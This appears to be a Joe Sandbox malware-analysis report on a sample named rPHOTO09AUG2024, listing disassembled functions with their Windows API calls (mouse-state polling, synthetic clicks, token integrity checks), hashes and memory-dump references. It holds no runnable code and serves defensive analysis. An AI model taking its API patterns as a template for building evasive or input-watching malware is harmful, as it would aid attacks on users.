Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 8efcd7118db597258b224cd56506feb0b7a82f83ad1f97296a29cd3d4b66ce3d
Instruction ID: eb74db5ed727f6cbf0af39e2aaf77c7617eb4f093e249fb69350036f4f6143b2
Opcode Fuzzy Hash: 8efcd7118db597258b224cd56506feb0b7a82f83ad1f97296a29cd3d4b66ce3d
Instruction Fuzzy Hash: E751E835A00205DFCF01EF65C9919AEBBF5EF49310B188099E849AB362CB35AD51DF70

Function 00DCA2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f37ad6758a6ade90459a86f07fedebea4217e07a5f88abdb1c1658ab2d782d23
Instruction ID: 66dc035bd7ce83417146a5aefc7b21baa583117dadeb49bdf7b9f9af639c7f90
Opcode Fuzzy Hash: f37ad6758a6ade90459a86f07fedebea4217e07a5f88abdb1c1658ab2d782d23
Instruction Fuzzy Hash: 0641133590024EAFC724DBACCC58FE9BBA5EB09314F084269F959E72E0C730AD41DA71

Function 00D42344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00D42357
ScreenToClient.USER32(00E067B0,?), ref: 00D42374
GetAsyncKeyState.USER32(00000001), ref: 00D42399
GetAsyncKeyState.USER32(00000002), ref: 00D423A7

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: ebd73c11d13c6dfaea778756242ea17449c6c4d3817addbc5f17d600221d5f6c
Instruction ID: cffdc559c9c4619f81534d514006ebece132e0f4c8d4417c4e7df8885f48537c
Opcode Fuzzy Hash: ebd73c11d13c6dfaea778756242ea17449c6c4d3817addbc5f17d600221d5f6c
Instruction Fuzzy Hash: BD419E3151421AFFCF159F68C848AEDBB74FB05324F64836EF82892291D7359990DBB1

Function 00D96920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D9695D
TranslateAcceleratorW.USER32(?,?,?), ref: 00D969A9
TranslateMessage.USER32(?), ref: 00D969D2
DispatchMessageW.USER32(?), ref: 00D969DC
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D969EB

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: da66f417f3351218b96c5c6817cf6b27ed39424cf84b78b002c2ef0c8b73b00c
Instruction ID: 76c538d9de27a952d45e03107249ebd80ac9793fb011005e19ba1360e09377ff
Opcode Fuzzy Hash: da66f417f3351218b96c5c6817cf6b27ed39424cf84b78b002c2ef0c8b73b00c
Instruction Fuzzy Hash: 9A31A071940247AFDF208FB5DC44FB67BACEB01304F184169E461E61A1E735D899DBB0

Function 00D98F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00D98F12
PostMessageW.USER32(?,00000201,00000001), ref: 00D98FBC
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00D98FC4
PostMessageW.USER32(?,00000202,00000000), ref: 00D98FD2
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00D98FDA

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 7e8816ff0833ae601bafb70501a64332f57d4fef80e179f8733f777181fe2cee
Instruction ID: 56124919bcb49d7ab416eadaee92120969dbe4eaf8ebf2327ad334d599a6c7be
Opcode Fuzzy Hash: 7e8816ff0833ae601bafb70501a64332f57d4fef80e179f8733f777181fe2cee
Instruction Fuzzy Hash: 6A31DC7150021AEBDF00CF68D94CAEE7BB6EF05715F144229F965EB2D0C7B09A10EBA0

Function 00D9B6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00D9B6C7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00D9B6E4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00D9B71C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00D9B742
_wcsstr.LIBCMT ref: 00D9B74C

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 539195ecdcc76c4aa18f2f98bcd00f9642ce6332b02442b5e2c54ed407a7f0aa
Instruction ID: 6b1a498f32c317a6cc420fd88e5f5a38fc7e46a94a91230e238405342c62aa4f
Opcode Fuzzy Hash: 539195ecdcc76c4aa18f2f98bcd00f9642ce6332b02442b5e2c54ed407a7f0aa
Instruction Fuzzy Hash: 8C210132244305BBEF255B79AD49E7B7BA9DF89720F05413AF805CA2A1EF61DC4096B0

Function 00DCB405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00D42612: GetWindowLongW.USER32(?,000000EB), ref: 00D42623

GetWindowLongW.USER32(?,000000F0), ref: 00DCB44C
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00DCB471
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00DCB489
GetSystemMetrics.USER32(00000004), ref: 00DCB4B2
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00DB1184,00000000), ref: 00DCB4D0

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 58941c06db6254183d7da7a87e4c14f6b304dfdb13829639bb81554709ad1330
Instruction ID: 8f7bc09c38065e30bc67fedd10cda06f682f4dfd9911de8d2414307ba179c3d4
Opcode Fuzzy Hash: 58941c06db6254183d7da7a87e4c14f6b304dfdb13829639bb81554709ad1330
Instruction Fuzzy Hash: DB217131918257AFCB188F38DC05F6637A5EB05738F14462AF925D72E1E730D851DB60

Function 00D997E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00D99802

Part of subcall function 00D47D2C: _memmove.LIBCMT ref: 00D47D66

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00D99834
__itow.LIBCMT ref: 00D9984C
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00D99874
__itow.LIBCMT ref: 00D99885

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: d4f2bd722fffc8bb94974bae20239dbef1cedf93bb6281e368575316a5275e56
Instruction ID: 3fb2cc2c6ce54537c815a91480afb19ce8409d2e0c14adfdf67527d6eb6c87bf
Opcode Fuzzy Hash: d4f2bd722fffc8bb94974bae20239dbef1cedf93bb6281e368575316a5275e56
Instruction Fuzzy Hash: FF219571B01209ABDF109B698C96EEEBBA9EF4A710F08403DF905DB291D7708D4597F1

Function 00D412F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D4134D
SelectObject.GDI32(?,00000000), ref: 00D4135C
BeginPath.GDI32(?), ref: 00D41373
SelectObject.GDI32(?,00000000), ref: 00D4139C

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 6fe5b5be9930e358defb64c2b98f416c6e856581ea3c425ccda92a91a8568c0c
Instruction ID: 44ca2223ba847eda30e66cb296630ed9cb784bfa56653a84ff2f0ef17660749b
Opcode Fuzzy Hash: 6fe5b5be9930e358defb64c2b98f416c6e856581ea3c425ccda92a91a8568c0c
Instruction Fuzzy Hash: FB217470800306DFDB159F26EC097A97BF9FB00761F18C226F454A61A0D37298E9DBB1

Function 00D9C161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00D9C176
_memcmp.LIBCMT ref: 00D9C194
_memcmp.LIBCMT ref: 00D9C1A7
_memcmp.LIBCMT ref: 00D9C1BF
_memcmp.LIBCMT ref: 00D9C1D7

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 568047846914cda2e684135cfea458c396161b6b6d2e69255eed8671f6b7d3d7
Instruction ID: e4c78d0c15e3f1f7da1846fa4a9aafb5a56679e79d5160c1e0b68df3cf6346f6
Opcode Fuzzy Hash: 568047846914cda2e684135cfea458c396161b6b6d2e69255eed8671f6b7d3d7
Instruction Fuzzy Hash: ED0192A56543057BEB14B6249D42EBB635CDB21394B484022FD04A7283E7A0EE1582F9

Function 00DA4D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00DA4D5C
__beginthreadex.LIBCMT ref: 00DA4D7A
MessageBoxW.USER32(?,?,?,?), ref: 00DA4D8F
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00DA4DA5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00DA4DAC

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 60ec5091d7eace050dddd992a7d7928333bd06431b07a0a8a950330b5a2a565a
Instruction ID: 52cf016fd9bfdbbe51be4c58b85ec94fb9c1d351d78886327c9d6236dcd13d35
Opcode Fuzzy Hash: 60ec5091d7eace050dddd992a7d7928333bd06431b07a0a8a950330b5a2a565a
Instruction Fuzzy Hash: 5C11E572904345BFCB019BA89C04ADA7FADEB85320F184265F914D33A0D6B18D4487B0

Function 00D9874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00D98766
GetLastError.KERNEL32(?,00D9822A,?,?,?), ref: 00D98770
GetProcessHeap.KERNEL32(00000008,?,?,00D9822A,?,?,?), ref: 00D9877F
HeapAlloc.KERNEL32(00000000,?,00D9822A,?,?,?), ref: 00D98786
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00D9879D

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: d18eb270e30c8f7220fec4b95bc01a7fe423f9d5b269186f764a2d8cff623b19
Instruction ID: fc3fb184e42c428e1d65b305a17b4cccb21ab31f1f1f8d8672e20751b8330336
Opcode Fuzzy Hash: d18eb270e30c8f7220fec4b95bc01a7fe423f9d5b269186f764a2d8cff623b19
Instruction Fuzzy Hash: AC01FB71641306FFDB204FA6DC88DAB7FADEF9A755B240569F849C2260DA319D00DA70

Function 00DA54E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00DA5502
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00DA5510
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00DA5518
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00DA5522
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00DA555E

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 22b71bd016a67be6a0e0b550f84b07f785ab2e11282ce3223ac8064b682179c7
Instruction ID: cd39a709dea978f84f810308a5b50113ee6139f23bb4b8429db3218209031728
Opcode Fuzzy Hash: 22b71bd016a67be6a0e0b550f84b07f785ab2e11282ce3223ac8064b682179c7
Instruction Fuzzy Hash: C1010975D01A1ADBCF00AFE9E888AEDBB79BB0A711F490056E942F2244DB3095548BB1

Function 00D97652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D9758C,80070057,?,?,?,00D9799D), ref: 00D9766F
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D9758C,80070057,?,?), ref: 00D9768A
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D9758C,80070057,?,?), ref: 00D97698
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D9758C,80070057,?), ref: 00D976A8
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D9758C,80070057,?,?), ref: 00D976B4

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: c0f98bf8c830e6ea144c39a0f0fc688929acae2ea8d67100dd58705c9376a8b1
Instruction ID: 78c80c758c8397efa0ed3ad12a05d63ccbda311115f6aed6c646c4a3bae4e38d
Opcode Fuzzy Hash: c0f98bf8c830e6ea144c39a0f0fc688929acae2ea8d67100dd58705c9376a8b1
Instruction Fuzzy Hash: 46015AB2615606ABDB109F68DC48EAA7BAEEF48751F140028FD04D2321E731DE419AB0

Function 00D985F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00D98608
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00D98612
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00D98621
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00D98628
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00D9863E

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: b315fc41ca3dd1ecec44224b139e02438391a47a146edbb84ef82385ba817f1b
Instruction ID: 921788478aedc3f667180cfdfdec4724d37c23ee0e281d1500bafebadb1286ab
Opcode Fuzzy Hash: b315fc41ca3dd1ecec44224b139e02438391a47a146edbb84ef82385ba817f1b
Instruction Fuzzy Hash: 24F04F31201306AFEB100FA5DC89FAB3FADFF8AB54B040425F945C6250CB659C41EA70

Function 00D98652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00D98669
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00D98673
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D98682
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00D98689
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D9869F

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: bb595ef370648134d8d58f00376f4b1115dba84fd9532f00120ef31b768a249d
Instruction ID: 96b250f1c2a5c492fdd4178b36a5e6ca70ef09bf6cc1d2c2992ee3e036bfea23
Opcode Fuzzy Hash: bb595ef370648134d8d58f00376f4b1115dba84fd9532f00120ef31b768a249d
Instruction Fuzzy Hash: 80F04F71200306AFEB111FA5EC89EA73FBDFF8AB54B180026F945C6250CA619941EA70

Function 00D9C6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00D9C6BA
GetWindowTextW.USER32(00000000,?,00000100), ref: 00D9C6D1
MessageBeep.USER32(00000000), ref: 00D9C6E9
KillTimer.USER32(?,0000040A), ref: 00D9C705
EndDialog.USER32(?,00000001), ref: 00D9C71F

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 04a51bd91935c0ab50e1a542ff0284494f56d48bd9c0c9a007cd272f1b089f47
Instruction ID: b36d7bc0332e384d1769dd2f133becb90d52757ef58dc2de7a2dea4fed5037b3
Opcode Fuzzy Hash: 04a51bd91935c0ab50e1a542ff0284494f56d48bd9c0c9a007cd272f1b089f47
Instruction Fuzzy Hash: 63014B30550706ABEB219B60DD8EFA677B9FB00705F041669B582E15E1DBE0A9588BA0

Function 00D413B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00D413BF
StrokeAndFillPath.GDI32(?,?,00D7BAD8,00000000,?), ref: 00D413DB
SelectObject.GDI32(?,00000000), ref: 00D413EE
DeleteObject.GDI32 ref: 00D41401
StrokePath.GDI32(?), ref: 00D4141C

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
